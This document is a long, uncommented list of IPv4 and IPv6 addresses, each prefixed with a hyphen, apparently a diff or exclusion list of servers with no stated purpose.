-121.199.35.166 -223.31.50.214 -103.198.45.6 -154.16.116.101 -5.153.18.169 -111.231.109.233 -2600:3c01::f03c:91ff:fec8:efcf -72.52.214.145 -104.224.203.151 -185.154.130.31 -173.254.238.79 -172.247.51.218 -133.130.106.177 -172.106.184.48 -103.240.213.203 -190.145.101.93 -34.203.113.188 -111.68.8.69 -120.26.233.6 -198.13.122.226 -136.243.116.83 -45.35.163.31 -103.28.38.117 -23.225.113.223 -185.200.229.5 -182.16.7.186 -107.187.41.36 -107.178.150.104 -23.234.26.27 -121.42.181.176 -217.150.94.106 -213.181.208.129 -122.9.163.195 -45.61.112.51 -52.52.82.99 -46.45.184.56 -103.89.159.246 -198.154.249.40 -35.194.156.90 -49.212.142.61 -217.150.94.87 -114.215.42.125 -212.83.143.105 -185.13.58.222 -69.65.56.178 -121.162.44.71 -68.169.51.174 -185.13.58.72 -121.42.160.53 -23.225.0.129 -64.71.14.91 -5.187.33.248 -206.53.160.166 -23.238.145.126 -185.13.56.87 -2600:3c02::f03c:91ff:fe69:c09 -109.169.76.53 -84.241.61.202 -103.240.214.147 -14.143.38.173 -61.194.8.26 -107.148.195.5 -59.188.231.49 -122.9.22.143 -198.58.116.134 -98.124.177.159 -46.21.196.42 -221.5.111.156 -171.244.8.150 -115.28.169.20 -37.187.114.27 -66.171.239.186 -182.16.32.171 -69.85.86.241 -100.42.125.17 -114.215.114.108 -115.28.133.168 -180.169.112.242 -45.55.248.167 -72.1.245.2 -91.221.99.158 -188.225.8.28 -202.51.189.23 -61.223.207.171 -118.190.2.198 -62.149.17.94 -37.252.96.13 -36.67.204.210 -23.225.0.211 -61.240.150.220 -39.108.83.173 -202.177.151.54 -202.104.110.184 -173.0.63.107 -37.187.205.80 -68.64.165.125 -174.138.168.51 -120.76.206.59 -103.84.46.130 -182.23.95.203 -149.202.179.249 -5.145.174.104 -54.246.123.63 -198.24.163.240 -194.242.114.247 -162.220.78.20 -2a0a:7d80:1:7::100:370 -89.44.32.101 -23.225.113.230 -2a0a:7d80:1:9::98:300 -120.55.83.3 -188.166.66.172 -185.42.223.156 -136.0.69.31 -66.179.102.225 -172.107.73.196 -62.212.32.153 -217.18.43.84 -39.108.192.229 -172.106.187.239 -198.37.112.87 -45.117.83.146 -103.56.156.138 -23.111.164.6 -58.177.114.3 -172.246.196.247 -2a0a:7d80:1:7::95:256 -5.135.224.34 -104.202.185.240 -2a0a:7d80:1:9::98:190 -103.42.57.87 -192.102.6.189 -111.202.15.43 -176.56.62.20 -13.228.94.209 -5.135.224.62 -83.149.75.39 -115.236.100.18 -79.124.6.171 -5.178.109.84 -103.100.157.196 -101.200.120.110 -176.122.199.14 -72.55.173.179 -114.215.172.61 -62.100.206.3 -172.255.159.226 -120.76.78.58 -144.217.181.201 -160.16.52.27 -91.88.111.246 -103.80.27.148 -67.159.51.4 -107.150.119.46 -213.74.192.61 -146.185.156.187 -137.118.45.11 -2a0a:7d80:1:7::102:d5 -37.187.248.82 -122.9.22.156 -153.120.7.16 -158.69.149.31 -219.232.32.51 -114.119.115.45 -23.19.202.30 -62.210.97.94 -178.33.15.107 -85.204.50.33 -62.63.191.30 -115.126.23.171 -103.239.48.11 -176.58.117.143 -81.94.54.66 -121.42.169.248 -103.41.126.53 -157.7.121.71 -37.59.168.142 -111.68.15.43 -89.108.93.78 -212.48.74.5 -204.93.61.67 -198.58.115.129 -116.255.153.228 -27.118.26.118 -103.43.71.185 -133.130.107.148 -139.224.222.164 -149.56.254.181 -122.9.15.17 -50.62.212.185 -103.240.213.71 -120.77.214.26 -2a0a:7d80:1:7::107:c4 -64.120.123.192 -172.104.61.118 -23.88.82.117 -172.246.220.114 -153.126.192.241 -107.178.149.91 -27.147.136.140 -192.169.244.176 -209.126.105.99 -172.104.16.47 -119.23.53.31 -77.108.90.245 -92.51.182.212 -173.243.113.161 -172.246.196.118 -200.55.193.52 -95.183.3.204 -116.5.212.109 -91.231.84.28 -136.0.69.210 -94.76.250.227 -103.240.213.55 -23.226.231.114 -98.124.176.203 -54.36.36.6 -46.105.58.136 -173.224.116.158 -173.192.84.215 -91.237.99.163 -103.240.212.214 -46.105.86.77 -158.69.27.175 -178.33.164.216 -104.202.185.199 -43.230.143.193 -46.166.142.176 -54.158.24.235 -60.205.145.216 -185.8.173.230 -192.249.87.92 -117.50.0.119 -62.149.77.37 -220.194.43.5 -45.118.132.249 -47.91.76.189 -173.199.144.94 -67.196.126.236 -136.0.69.193 -173.198.249.61 -107.187.41.51 -111.202.15.37 -91.240.28.10 -120.26.113.65 -51.15.142.190 -133.242.8.240 -114.202.2.238 -123.206.68.230 -182.140.210.13 -121.9.243.213 -159.148.20.108 -178.18.91.139 -54.36.141.253 -153.126.199.153 -101.230.209.155 -118.193.235.80 -74.208.227.241 -54.254.154.221 -64.6.100.171 -112.126.77.60 -54.155.35.141 -159.89.225.140 -93.115.31.73 -103.230.120.241 -147.135.220.100 -109.235.64.137 -150.95.138.93 -5.153.23.132 -149.202.103.235 -47.93.190.126 -159.89.194.185 -200.145.181.2 -198.100.145.199 -203.162.166.13 -194.19.246.26 -211.149.232.226 -37.1.208.65 -117.48.216.38 -104.131.186.29 -86.104.177.69 -64.251.10.11 -192.158.13.214 -137.74.180.137 -172.247.51.37 -142.91.95.128 -2a0a:7d80:1:7::105:28c -172.107.146.150 -153.120.50.218 -116.62.65.124 -172.107.75.234 -104.238.159.15 -103.12.49.53 -165.230.124.197 -111.67.198.129 -120.26.216.102 -176.223.197.33 -121.41.119.92 -1.119.132.107 -80.77.95.7 -164.132.214.80 -202.9.100.161 -69.50.209.194 -139.196.10.124 -64.22.253.145 -77.55.234.100 -52.80.105.108 -123.206.92.226 -66.70.192.189 -185.10.99.45 -2a0a:7d80:1:7::102:104 -211.21.23.86 -31.3.153.41 -116.228.79.214 -174.122.201.24 -202.105.232.24 -159.89.183.123 -5.153.22.76 -104.203.82.43 -156.237.177.163 -172.107.73.204 -120.78.149.135 -58.84.55.172 -45.116.137.195 -178.32.50.160 -198.23.131.125 -213.135.71.22 -195.182.41.200 -118.219.234.25 -198.89.124.192 -103.48.80.66 -103.231.70.235 -85.214.116.213 -114.215.223.95 -162.255.225.27 -195.154.33.100 -172.246.196.53 -133.130.106.17 -185.106.21.11 -131.94.129.27 -178.62.236.235 -172.107.73.223 -212.160.139.196 -142.44.201.200 -13.59.91.248 -123.30.171.132 -125.253.113.2 -5.196.140.58 -107.178.162.96 -65.49.9.82 -67.23.100.96 -216.224.169.213 -194.190.169.56 -114.55.61.19 -158.69.118.149 -13.125.77.248 -45.32.111.178 -153.126.128.71 -172.104.124.102 -45.32.116.44 -23.225.148.83 -2a0a:7d80:1:7::95:212 -159.89.100.40 -120.25.206.65 -103.238.212.101 -27.112.70.180 -91.121.42.2 -202.9.100.185 -202.97.183.148 -159.89.90.175 -42.112.16.123 -212.68.42.20 -104.207.158.77 -198.23.150.126 -47.90.93.170 -68.169.59.93 -119.147.137.112 -104.203.82.70 -62.210.28.206 -203.162.166.105 -104.131.127.25 -142.91.232.107 -2001:690:22c0:8601::5 -198.27.115.59 -219.139.150.10 -120.24.81.161 -221.121.12.245 -103.205.1.68 -208.94.238.45 -116.62.219.211 -134.119.224.173 -140.127.113.215 -114.55.5.222 -115.29.244.246 -123.207.74.147 -103.240.212.213 -162.213.2.133 -184.173.138.235 -103.12.50.2 -91.142.210.11 -31.28.163.246 -23.230.19.29 -104.245.102.40 -182.16.59.69 -67.227.154.47 -150.95.135.46 -218.32.216.136 -211.149.221.212 -38.98.50.6 -50.22.188.75 -2a0a:7d80:1:7::94:58 -45.79.223.24 -149.202.61.29 -101.251.223.198 -173.36.218.73 -159.89.15.170 -160.5.169.46 -111.93.170.242 -93.123.18.219 -162.213.210.156 -159.89.230.169 -104.131.109.23 -69.50.209.199 -23.244.241.204 -128.199.216.213 -219.94.167.224 -104.155.36.41 -103.1.150.99 -34.248.147.158 -216.75.8.51 -198.7.61.46 -5.189.132.48 -106.186.112.115 -45.55.238.73 -101.201.111.181 -176.223.197.62 -160.153.113.64 -172.246.196.101 -117.34.7.21 -74.208.197.115 -112.124.28.251 -45.32.214.63 -66.171.239.79 -130.113.172.46 -23.230.19.126 -85.235.217.103 -198.128.151.17 -152.14.136.195 -218.28.177.188 -67.212.69.206 -118.31.246.20 -80.231.171.113 -178.170.217.34 -202.84.32.26 -133.242.146.20 -107.165.201.87 -103.240.213.19 -199.30.246.155 -54.183.67.186 -112.199.207.51 -207.154.205.146 -172.104.44.167 -210.211.119.18 -61.194.13.69 -91.121.254.205 -123.56.6.43 -157.7.223.242 -192.99.78.25 -104.131.191.34 -45.79.190.50 -34.212.229.97 -128.199.68.75 -104.232.102.169 -194.19.246.92 -174.138.169.28 -156.67.216.251 -18.85.28.131 -103.242.66.88 -95.142.168.32 -2a0a:7d80:1:7::91:15d -103.251.134.94 -199.30.246.135 -157.252.245.27 -112.124.45.137 -149.210.128.243 -54.167.14.150 -184.173.138.240 -36.250.6.156 -45.32.47.26 -172.246.196.111 -104.202.185.211 -37.59.138.235 -106.187.90.155 -180.178.49.44 -58.82.167.36 -115.159.84.215 -76.72.168.167 -172.107.75.223 -172.247.51.201 -216.194.165.7 -104.207.44.116 -68.68.104.227 -87.94.101.116 -106.3.208.106 -103.53.168.69 -211.149.155.144 -103.240.215.72 -103.90.220.86 -125.253.123.9 -193.136.164.159 -87.98.217.84 -140.116.249.143 -103.48.82.21 -68.68.111.8 -146.185.177.185 -120.26.226.194 -158.85.30.76 -217.61.128.111 -109.232.224.16 -23.88.82.142 -47.92.89.227 -176.119.52.180 -185.47.62.248 -122.195.200.195 -176.103.62.16 -123.31.29.54 -223.25.245.155 -113.16.213.74 -113.160.246.186 -172.246.220.80 -139.162.15.34 -45.114.117.36 -121.40.209.129 -202.152.26.204 -37.252.96.180 -112.124.8.209 -54.67.4.243 -107.150.46.250 -107.178.150.108 -183.149.90.137 -159.203.252.190 -103.240.213.110 -103.240.213.62 -2a0a:7d80:1:7::96:1ec -94.23.69.14 -178.172.236.72 -182.92.102.4 -213.136.89.57 -194.58.58.96 -162.220.59.44 -49.50.76.49 -213.192.80.102 -192.241.71.12 -194.19.246.53 -108.168.174.124 -49.212.221.61 -173.236.107.55 -198.98.112.26 -5.2.64.28 -47.93.0.133 -119.9.105.224 -46.22.220.51 -195.245.194.126 -120.132.61.25 -178.170.217.51 -142.91.95.117 -173.236.115.233 -104.232.75.168 -120.27.117.17 -159.65.183.67 -45.77.163.147 -43.255.123.85 -69.30.211.213 -188.165.89.45 -91.121.77.43 -195.254.176.137 -86.105.187.96 -217.182.173.121 -192.241.146.176 -139.199.86.57 -222.143.124.107 -23.224.115.65 -85.254.126.104 -111.67.198.109 -23.111.148.109 -54.228.121.77 -112.74.114.24 -172.104.93.134 -202.72.218.164 -103.240.213.14 -103.233.58.218 -95.183.3.28 -59.153.149.227 -67.212.69.204 -139.224.52.182 -195.191.235.33 -80.235.76.101 -103.12.49.19 -185.76.77.158 -5.178.109.38 -192.241.210.36 -107.178.147.104 -82.196.4.178 -221.5.109.11 -23.104.135.154 -212.129.6.81 -45.79.102.21 -47.93.235.218 -163.44.193.158 -69.16.236.65 -64.15.140.195 -142.91.95.30 -119.23.238.93 -27.254.140.91 -142.91.95.121 -122.156.175.61 -164.132.17.210 -122.9.15.50 -88.99.140.164 -14.102.150.59 -51.255.157.8 -217.100.88.11 -148.251.135.151 -156.235.171.42 -121.43.102.132 -65.60.5.92 -91.241.27.251 -117.27.143.70 -198.176.48.72 -122.9.15.3 -104.168.87.121 -37.49.229.35 -101.201.75.161 -172.107.71.35 -58.229.184.15 -117.78.50.101 -178.32.145.36 -167.114.54.89 -201.49.15.137 -209.209.183.251 -133.130.111.249 -144.217.206.33 -65.182.164.55 -5.45.72.50 -139.162.202.187 -198.211.114.132 -2a0a:7d80:1:7::100:3c -64.120.123.163 -54.38.79.228 -198.37.114.97 -2a0a:7d80:1:7::93:208 -172.106.75.232 -128.199.234.27 -173.82.138.194 -104.207.44.94 -103.28.38.241 -59.188.231.45 -106.14.57.40 -72.1.245.24 -104.236.58.191 -103.198.192.163 -156.235.172.92 -103.100.157.134 -192.99.126.30 -75.126.200.212 -23.224.115.181 -192.99.230.40 -103.90.137.157 -5.178.109.235 -66.171.239.72 -58.42.235.213 -173.214.110.226 -119.59.67.33 -185.67.3.198 -172.246.196.197 -177.93.110.19 -137.74.243.192 -178.172.148.9 -51.254.5.207 -185.50.198.185 -23.244.241.207 -172.246.220.160 -201.191.100.210 -23.225.113.165 -60.12.147.85 -193.70.113.181 -47.92.27.124 -103.249.84.181 -23.92.77.12 -184.172.61.121 -71.18.91.62 -153.126.181.61 -58.26.242.130 -192.99.0.208 -104.238.179.248 -62.197.228.188 -59.188.226.148 -23.225.0.150 -2a0a:7d80:1:7::106:ce -23.111.148.110 -216.104.47.130 -172.246.220.185 -101.132.168.197 -77.75.32.155 -159.203.186.204 -35.195.34.234 -5.135.45.241 -142.44.201.201 -198.50.131.119 -120.55.82.225 -194.19.246.59 -123.60.202.247 -91.192.108.169 -207.154.225.190 -45.116.175.146 -202.168.148.164 -119.81.176.249 -103.234.99.228 -185.164.138.211 -185.33.145.11 -217.18.43.81 -162.247.98.122 -104.148.75.217 -121.127.246.199 -185.38.45.105 -103.240.214.217 -138.201.88.96 -216.107.153.134 -199.231.93.89 -188.65.211.188 -45.76.174.73 -185.50.198.68 -1.255.109.119 -66.70.150.214 -142.91.95.19 -45.77.40.239 -120.92.237.200 -141.138.202.145 -185.116.215.229 -159.148.13.139 -45.32.102.167 -103.235.238.86 -182.16.49.109 -89.251.179.4 -169.45.78.252 -204.74.223.105 -172.246.196.60 -123.59.101.126 -142.44.214.190 -123.207.14.247 -85.25.133.37 -123.57.248.216 -23.238.129.83 -117.53.155.142 -188.165.61.236 -174.139.52.163 -2a0a:7d80:1:7::107:4 -80.178.173.84 -67.196.126.247 -91.216.173.4 -103.205.2.88 -93.87.61.218 -182.163.126.236 -144.168.73.131 -23.225.89.189 -185.8.61.8 -23.224.115.14 -66.84.9.153 -23.19.202.17 -182.16.59.205 -122.114.42.209 -109.251.204.43 -45.114.118.226 -188.166.237.138 -138.68.20.120 -103.240.213.218 -203.238.187.83 -23.229.227.188 -139.162.25.94 -185.50.199.123 -124.202.241.238 -123.108.200.147 -103.240.212.172 -109.235.66.42 -212.101.106.32 -107.180.85.159 -219.136.254.12 -107.186.35.192 -121.201.66.150 -146.185.141.152 -158.69.36.27 -185.18.53.134 -202.6.17.149 -91.229.23.96 -103.57.190.83 -74.207.234.84 -116.62.153.232 -202.97.183.144 -95.188.72.210 -178.32.215.194 -61.64.57.167 -80.249.168.115 -120.24.39.105 -185.104.152.67 -112.121.178.218 -103.30.71.125 -98.126.158.146 -5.22.254.22 -159.122.18.181 -208.167.225.235 -96.8.127.96 -120.25.72.118 -136.0.69.47 -54.36.38.246 -14.225.2.147 -190.119.244.173 -103.240.215.156 -209.160.51.67 -211.152.37.172 -174.139.37.120 -182.16.48.187 -155.94.163.98 -103.41.126.52 -209.188.18.200 -164.160.33.123 -103.41.126.56 -115.159.226.65 -45.252.250.178 -172.87.197.213 -217.23.14.86 -80.240.134.93 -47.96.160.91 -5.178.109.211 -80.93.181.150 -107.186.35.140 -155.94.69.217 -124.237.78.132 -156.237.178.152 -2a0a:7d80:1:7::104:5f -115.28.94.61 -45.77.99.176 -106.15.56.65 -41.77.239.50 -212.83.134.108 -2a0a:7d80:1:9::99:293 -120.76.25.209 -173.212.242.126 -198.44.190.202 -43.230.64.5 -202.40.180.52 -37.252.14.168 -91.216.8.6 -31.169.92.11 -216.92.39.24 -172.246.196.244 -121.199.3.196 -62.63.191.34 -2a0a:7d80:1:7::97:19e -120.55.72.53 -200.74.240.38 -62.149.23.19 -133.130.96.24 -80.93.210.142 -150.95.129.221 -45.55.73.5 -194.19.246.105 -162.244.34.107 -133.242.15.219 -192.99.180.235 -139.217.27.115 -194.27.218.17 -217.150.94.79 -95.142.167.44 -64.185.234.175 -46.101.112.47 -172.106.187.218 -50.23.130.153 -182.92.196.47 -132.148.87.19 -176.126.167.224 -103.221.221.141 -103.12.51.44 -121.40.24.157 -133.242.204.48 -66.33.193.102 -50.22.189.129 -173.236.78.84 -176.9.107.177 -188.132.147.188 -45.32.59.162 -198.55.102.248 -166.78.6.178 -120.25.85.49 -104.223.108.25 -182.16.58.38 -103.195.54.60 -69.175.121.222 -64.207.148.194 -103.35.151.124 -185.12.111.64 -216.57.71.60 -172.107.75.246 -123.56.68.200 -43.239.176.169 -91.217.67.117 -67.229.63.126 -155.94.69.200 -182.18.23.123 -172.107.73.209 -156.235.170.19 -5.149.252.58 -52.1.82.192 -89.145.103.77 -58.49.19.210 -65.49.9.157 -104.168.145.74 -2a0a:7d80:1:7::104:35 -35.162.63.26 -163.172.50.37 -2a0a:7d80:1:7::107:88 -2a0a:7d80:1:7::97:120 -188.213.22.150 -122.9.22.148 -107.178.147.111 -103.240.212.196 -2a0a:7d80:1:7::102:13d -23.224.115.214 -198.235.132.73 -103.240.214.94 -103.100.157.111 -37.48.90.101 -104.250.133.163 -221.133.44.156 -181.117.22.5 -198.98.61.40 -150.95.153.123 -52.199.167.166 -185.50.199.134 -173.208.209.219 -128.199.180.193 -185.8.61.4 -37.75.11.125 -50.56.178.199 -85.254.49.91 -62.210.244.70 -104.130.28.63 -82.113.145.84 -219.166.139.98 -205.234.211.84 -104.207.50.87 -45.117.42.114 -208.96.162.246 -46.105.228.46 -2a0a:7d80:1:7::96:169 -160.16.236.238 -103.240.214.86 -120.26.112.80 -172.107.75.215 -95.213.149.243 -139.162.53.68 -192.99.93.185 -213.165.84.241 -52.74.168.134 -103.35.203.17 -153.122.103.152 -124.205.7.90 -108.168.174.103 -101.200.191.217 -194.19.246.64 -134.119.31.33 -158.69.237.47 -222.185.243.100 -120.92.227.103 -172.247.51.198 -172.246.196.218 -66.55.65.21 -162.254.149.161 -107.179.102.221 -103.240.213.112 -69.61.16.213 -120.76.79.30 -45.77.47.7 -217.23.157.131 -123.57.214.167 -59.106.209.39 -47.90.2.197 -178.32.163.50 -216.97.8.172 -183.238.101.227 -154.16.114.191 -45.77.115.239 -23.110.56.78 -2600:3c01::f03c:91ff:fedb:a70e -95.213.224.45 -198.27.77.49 -188.166.29.44 -149.202.115.237 -115.29.162.8 -91.134.144.12 -198.200.41.105 -104.202.185.219 -139.199.94.206 -62.210.142.88 -62.152.60.7 -66.39.142.90 -64.120.123.197 -91.250.100.36 -45.63.16.171 -216.92.90.100 -104.156.62.174 -5.79.104.39 -180.167.41.178 -103.240.213.29 -120.24.221.161 -185.13.58.76 -69.42.173.27 -188.165.129.63 -120.77.41.142 -103.75.118.29 -121.40.65.12 -106.14.78.3 -118.89.32.232 -59.188.231.16 -23.236.100.222 -209.126.119.142 -194.145.208.98 -139.162.63.238 -153.122.10.230 -107.186.35.98 -23.225.239.65 -133.130.120.60 -2a0a:7d80:1:7::101:1c9 -139.162.12.229 -95.211.81.222 -182.163.126.206 -174.138.127.130 -109.235.252.139 -54.250.155.78 -112.124.122.1 -45.32.118.31 -45.33.17.69 -115.28.166.230 -2a01:7b8:2011:e53f::7a9:adab -123.233.247.19 -103.74.121.183 -104.232.75.152 -139.129.117.102 -158.69.143.43 -2a0a:7d80:1:7::106:17d -186.233.190.34 -178.62.193.46 -2a0a:7d80:1:7::102:273 -181.15.89.3 -64.207.152.249 -69.164.214.79 -115.28.73.142 -108.61.210.117 -172.252.10.150 -5.135.118.226 -66.254.184.142 -162.247.235.69 -162.144.87.169 -103.240.215.93 -103.57.111.164 -185.50.198.121 -103.196.157.125 -104.207.40.143 -198.251.67.127 -209.142.66.203 -80.233.244.12 -69.4.87.55 -188.132.219.5 -2406:8c00:0:2580:4:147:: -103.20.192.90 -202.146.241.53 -104.207.152.66 -176.31.180.210 -46.105.83.173 -43.230.64.100 -156.237.177.177 -149.56.36.207 -103.240.212.110 -64.237.52.34 -121.41.51.131 -66.209.177.217 -185.233.128.156 -190.106.220.2 -142.4.113.196 -186.233.189.33 -181.214.55.248 -159.148.20.119 -188.93.95.211 -218.94.148.242 -149.202.144.245 -121.199.2.98 -104.207.50.86 -136.0.69.75 -91.121.83.38 -43.225.39.222 -116.112.3.190 -122.225.102.243 -217.182.38.120 -95.128.131.179 -119.29.39.229 -23.225.239.254 -185.127.16.172 -201.116.127.12 -114.215.28.109 -116.62.237.10 -158.69.176.200 -137.74.59.181 -113.66.109.38 -2a0a:7d80:1:7::105:83 -14.17.69.167 -91.239.232.140 -109.235.65.72 -23.19.202.9 -107.180.84.199 -50.23.141.194 -162.243.146.237 -153.126.178.95 -172.102.197.165 -106.185.34.25 -104.131.162.141 -136.0.69.111 -195.128.226.102 -120.55.167.160 -212.47.243.5 -91.121.35.27 -190.54.29.107 -23.234.5.52 -167.114.11.126 -220.128.199.37 -202.177.151.51 -101.236.20.185 -37.187.45.15 -122.9.5.38 -162.247.78.80 -208.43.222.104 -207.154.251.11 -45.77.117.230 -185.81.164.87 -45.255.134.76 -120.77.238.202 -139.196.84.27 -2a0a:7d80:1:7::92:7c -119.29.215.175 -174.37.247.114 -122.225.105.107 -174.138.16.43 -74.201.40.115 -50.22.198.219 -172.85.98.236 -163.44.113.131 -198.204.240.98 -45.61.114.35 -23.224.115.234 -35.201.156.16 -120.77.36.182 -121.40.72.74 -66.85.186.58 -198.13.62.148 -158.69.142.148 -81.0.214.204 -121.42.15.192 -144.168.123.8 -121.43.63.72 -138.197.79.151 -195.210.2.247 -43.247.89.172 -172.246.196.240 -118.89.60.158 -192.99.250.148 -139.199.70.50 -158.69.201.59 -42.51.16.21 -173.233.85.156 -159.203.207.50 -109.232.224.18 -23.19.22.4 -182.16.7.18 -103.48.80.99 -101.55.71.16 -216.172.106.50 -45.77.15.125 -62.149.23.22 -184.95.52.37 -216.158.229.133 -77.240.92.195 -114.55.249.102 -188.116.55.172 -107.178.149.121 -91.237.99.147 -93.175.29.20 -166.63.21.86 -5.196.85.133 -65.60.5.101 -156.235.170.101 -46.105.127.16 -139.129.128.221 -138.201.244.29 -104.202.185.68 -103.74.174.172 -2a0a:7d80:1:7::107:e1 -104.200.28.183 -212.129.43.177 -162.242.237.155 -121.54.161.97 -38.103.163.206 -193.124.17.142 -45.63.37.129 -46.105.189.250 -103.205.1.91 -67.225.243.46 -117.25.149.243 -203.67.100.58 -23.89.193.2 -23.89.193.2 -67.229.73.95 -103.98.17.163 -80.77.95.16 -149.56.85.241 -115.126.71.1 -72.14.182.114 -178.238.225.187 -123.55.73.223 -45.32.106.213 -122.114.176.250 -103.100.157.112 -103.240.212.26 -58.64.188.4 -80.233.244.23 -5.153.225.5 -23.225.0.24 -37.153.111.61 -178.79.166.61 -107.179.95.114 -205.147.103.7 -2001:19f8:16:4::5 -202.146.218.175 -5.178.109.58 -174.36.98.46 -66.23.237.6 -104.149.66.160 -23.238.145.67 -64.6.101.138 -46.231.204.160 -62.213.67.12 -104.202.185.50 -91.98.96.232 -172.246.220.102 -2a01:7e00::f03c:91ff:fe84:3b6b -171.217.113.60 -46.8.45.102 -195.88.34.12 -103.3.188.44 -47.97.8.169 -222.187.222.154 -205.186.143.165 -188.226.157.194 -49.73.84.165 -67.229.73.101 -35.201.233.254 -192.169.245.127 -2a0a:7d80:1:7::92:d9 -79.98.134.245 -196.44.99.19 -202.171.225.147 -182.254.226.146 -202.105.232.8 -51.254.149.213 -111.202.15.44 -2a01:4f8:172:ec9::2 -104.202.185.83 -70.32.77.187 -149.56.237.94 -104.155.129.6 -23.111.148.99 -149.56.122.65 -178.33.161.64 -70.32.104.249 -104.148.100.117 -122.9.235.248 -54.165.85.247 -93.87.23.178 -2a0a:7d80:1:7::91:13a -120.27.138.94 -104.202.185.171 -103.28.149.82 -202.92.5.116 -103.53.198.233 -123.206.32.26 -201.73.67.51 -128.14.93.254 -42.228.2.150 -37.157.193.111 -45.77.36.73 -153.125.234.27 -194.68.213.239 -220.170.192.226 -119.23.152.240 -43.241.209.66 -54.194.219.33 -176.223.197.54 -178.175.132.132 -69.65.41.153 -119.23.148.162 -2a0a:7d80:1:7::94:a6 -115.88.238.36 -149.56.151.144 -39.108.115.42 -164.70.8.176 -23.225.89.177 -142.91.95.136 -107.155.102.15 -93.175.203.89 -216.189.145.77 -149.62.168.93 -60.12.119.11 -103.6.192.104 -119.29.102.239 -186.233.191.18 -119.23.27.45 -103.210.237.63 -218.13.4.71 -182.253.21.109 -185.50.198.83 -185.69.152.199 -5.135.58.78 -192.169.226.232 -31.186.241.99 -185.150.191.19 -128.199.100.126 -67.222.143.116 -192.99.150.233 -208.94.238.38 -176.31.16.46 -211.149.236.242 -45.76.149.192 -46.17.45.192 -107.150.58.154 -109.232.223.14 -54.176.97.236 -52.220.152.172 -172.255.159.232 -109.169.76.69 -173.209.43.91 -50.115.116.237 -172.107.75.231 -193.151.90.119 -103.240.213.217 -103.12.68.232 -62.129.129.219 -113.57.197.122 -46.101.241.190 -2a0a:7d80:1:7::95:1d8 -188.166.198.158 -45.56.125.139 -104.236.8.67 -188.132.135.60 -119.50.172.70 -91.203.4.156 -174.139.70.153 -160.16.229.58 -120.24.71.167 -2600:3c01::f03c:91ff:fe56:d43b -60.12.40.6 -87.98.219.181 -112.126.80.219 -107.178.147.69 -94.23.17.103 -182.92.162.131 -116.62.135.217 -23.225.0.51 -46.252.29.30 -161.202.1.188 -182.254.135.184 -103.221.220.164 -185.104.152.221 -172.104.164.121 -185.65.200.120 -173.244.217.85 -45.77.134.127 -103.75.148.19 -47.93.10.153 -103.74.121.182 -88.85.247.184 -194.135.86.247 -139.199.157.167 -52.28.230.13 -153.120.50.220 -121.9.243.216 -166.63.21.40 -185.114.192.35 -188.165.124.45 -103.196.240.175 -187.191.96.236 -147.135.137.95 -188.166.183.117 -183.81.156.25 -103.12.51.60 -103.37.85.59 -192.3.109.47 -92.222.187.7 -209.222.20.152 -23.88.82.129 -93.115.31.59 -37.59.13.191 -45.40.162.197 -154.16.114.192 -2a0a:7d80:1:7::101:1e9 -139.196.79.37 -162.211.183.60 -61.184.34.236 -91.142.214.130 -192.99.190.174 -116.196.85.249 -80.77.95.2 -198.100.156.225 -154.56.1.11 -116.113.93.202 -163.47.35.210 -103.240.212.218 -43.230.203.52 -62.109.23.6 -45.61.113.40 -177.12.239.133 -195.94.214.220 -94.237.35.11 -121.40.133.252 -185.12.111.59 -174.142.54.14 -156.235.172.84 -165.227.11.196 -156.67.217.199 -2600:3c03::f03c:91ff:fe6e:5bc6 -114.201.229.7 -13.210.95.62 -195.8.206.135 -115.29.201.8 -216.55.131.195 -43.230.203.122 -172.107.147.22 -103.49.10.234 -217.170.197.88 -212.68.42.7 -149.56.169.128 -106.187.89.58 -198.50.176.64 -45.32.123.124 -103.240.213.4 -62.210.14.227 -213.163.72.167 -217.160.182.211 -64.6.98.9 -172.246.220.191 -182.254.220.236 -149.56.36.204 -193.19.175.200 -99.192.227.116 -200.124.227.21 -172.246.196.246 -2a01:7e00::f03c:91ff:fe3b:92e6 -170.75.152.173 -185.56.146.9 -216.250.105.171 -103.240.212.5 -162.242.233.227 -5.178.109.61 -122.9.229.142 -5.200.70.82 -72.1.245.115 -13.250.128.79 -117.34.118.38 -2600:3c03::f03c:91ff:fec8:8a5f -176.31.1.236 -2600:3c03::f03c:91ff:fe50:b2f7 -45.35.99.136 -121.40.101.57 -162.144.44.36 -199.119.141.42 -2600:3c00::f03c:91ff:fe61:6f09 -112.74.189.205 -2600:3c02::f03c:91ff:fedf:18f -181.112.138.171 -155.94.163.55 -43.249.9.43 -27.118.20.194 -185.31.159.50 -54.37.69.185 -212.48.86.170 -95.131.71.24 -67.205.175.48 -64.71.72.132 -107.148.194.29 -121.40.56.167 -35.185.191.59 -176.126.84.100 -185.129.249.74 -116.255.182.34 -5.189.190.103 -198.100.177.163 -103.240.214.164 -82.102.14.2 -209.239.123.248 -66.254.177.78 -103.21.150.26 -52.29.72.13 -69.64.73.57 -76.75.210.125 -23.238.176.204 -172.107.64.6 -204.93.61.112 -93.93.68.190 -178.237.35.12 -113.33.38.244 -104.202.185.170 -2a01:4f8:121:50e2::2 -5.77.56.53 -94.23.58.182 -2a0a:7d80:1:7::101:127 -182.254.211.185 -96.47.234.59 -153.120.164.243 -2600:3c03::f03c:91ff:fe6e:2687 -47.52.149.145 -173.193.149.126 -149.56.24.229 -5.178.109.237 -185.50.198.127 -45.35.99.143 -77.93.194.66 -87.106.82.178 -2600:3c03::f03c:91ff:fe70:7bfe -139.162.16.95 -2a0a:7d80:1:7::100:48 -164.132.3.79 -122.9.18.165 -47.100.39.60 -184.154.181.216 -50.23.78.145 -112.25.186.176 -172.246.220.76 -103.208.33.95 -185.104.152.41 -209.141.59.238 -173.0.63.216 -149.202.236.128 -202.55.156.5 -172.107.75.218 -188.68.240.185 -103.58.103.252 -61.240.150.188 -101.98.13.139 -139.196.215.129 -5.9.181.142 -172.107.146.186 -149.202.5.82 -169.48.200.178 -85.206.175.201 -123.125.148.32 -103.43.44.11 -117.48.209.20 -198.65.151.225 -98.124.177.170 -31.186.102.211 -23.19.22.50 -120.78.52.182 -192.165.185.210 -103.43.69.175 -83.68.42.9 -45.56.69.181 -112.121.168.123 -195.245.112.231 -104.148.100.126 -121.40.37.245 -212.86.37.165 -111.230.247.147 -103.10.191.163 -67.227.218.206 -103.198.45.40 -85.214.38.139 -107.170.12.139 -94.130.198.238 -185.98.63.126 -166.78.115.66 -182.16.63.146 -2600:3c03::f03c:91ff:fea8:4639 -31.28.163.241 -119.23.38.85 -115.126.53.23 -103.240.215.50 -5.39.121.100 -23.225.89.32 -87.98.235.27 -217.61.130.145 -2600:3c02::f03c:91ff:fedb:8a90 